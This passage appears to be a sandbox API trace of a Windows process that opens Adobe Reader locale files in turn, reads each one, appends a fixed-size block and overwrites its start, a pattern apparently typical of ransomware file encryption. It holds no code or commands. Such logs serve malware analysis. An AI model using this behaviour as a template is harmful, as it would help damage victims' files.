dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6200 [0082.633] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea96e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea96e8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.639] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6200 [0082.640] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.640] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.640] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.641] CloseHandle (hObject=0x1f0) returned 1 [0082.641] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\DVA.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\dva.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.642] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.642] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4c00 [0082.642] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.642] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.642] ReleaseMutex (hMutex=0x168) returned 1 [0082.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.ITA", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0082.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.ITA", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.ITA", lpUsedDefaultChar=0x0) returned 7 [0082.643] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.645] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3c00 [0082.645] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.648] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3c00 [0082.649] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.649] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.650] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.650] CloseHandle (hObject=0x1f0) returned 1 [0082.650] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\RdLang32.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\rdlang32.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.651] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.651] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x157000 [0082.651] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.651] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.652] ReleaseMutex (hMutex=0x168) returned 1 [0082.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.ITA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.ITA", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.ITA", lpUsedDefaultChar=0x0) returned 12 [0082.652] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0082.661] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.662] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x156000 [0082.662] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea96e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea96e8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.666] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x156000 [0082.667] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.667] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.667] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0082.668] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.668] CloseHandle (hObject=0x1f0) returned 1 [0082.668] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Spelling.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\spelling.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.669] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.669] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2800 [0082.669] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.670] ReleaseMutex (hMutex=0x168) returned 1 [0082.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.ITA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.ITA", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.ITA", lpUsedDefaultChar=0x0) returned 12 [0082.670] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.675] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0082.675] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.676] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0082.676] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.677] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.677] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.677] CloseHandle (hObject=0x1f0) returned 1 [0082.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Checkers.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\checkers.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.678] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.679] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x15e00 [0082.679] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.679] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.679] ReleaseMutex (hMutex=0x168) returned 1 [0082.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.JPN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.JPN", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.JPN", lpUsedDefaultChar=0x0) returned 12 [0082.679] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.681] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x14e00 [0082.681] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.682] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x14e00 [0082.682] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.683] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.683] WriteFile (in: hFile=0x1f0, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.684] CloseHandle (hObject=0x1f0) returned 1 [0082.684] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\pddom.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\pddom.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.685] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.685] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2200 [0082.685] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.685] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.685] ReleaseMutex (hMutex=0x168) returned 1 [0082.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.JPN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.JPN", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.JPN", lpUsedDefaultChar=0x0) returned 9 [0082.686] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.687] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1200 [0082.688] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.689] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1200 [0082.689] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.689] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0082.689] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.689] CloseHandle (hObject=0x1f0) returned 1 [0082.690] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0082.690] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.691] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa11a [0082.691] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0082.691] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.691] ReleaseMutex (hMutex=0x168) returned 1 [0082.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0082.691] ReadFile (in: hFile=0x1f0, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.121] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x911a [0083.126] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.128] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x911a [0083.141] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.145] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.146] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.146] CloseHandle (hObject=0x1f0) returned 1 [0083.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Annots.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\annots.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.147] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.148] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x56c00 [0083.162] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.162] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.162] ReleaseMutex (hMutex=0x168) returned 1 [0083.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.KOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.KOR", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.KOR", lpUsedDefaultChar=0x0) returned 10 [0083.163] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0083.165] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x55c00 [0083.165] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.167] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x55c00 [0083.167] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.168] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.168] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0083.169] CloseHandle (hObject=0x1f0) returned 1 [0083.169] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\makeaccessible.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\makeaccessible.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.170] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.170] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xbc00 [0083.170] SetFilePointer (in: 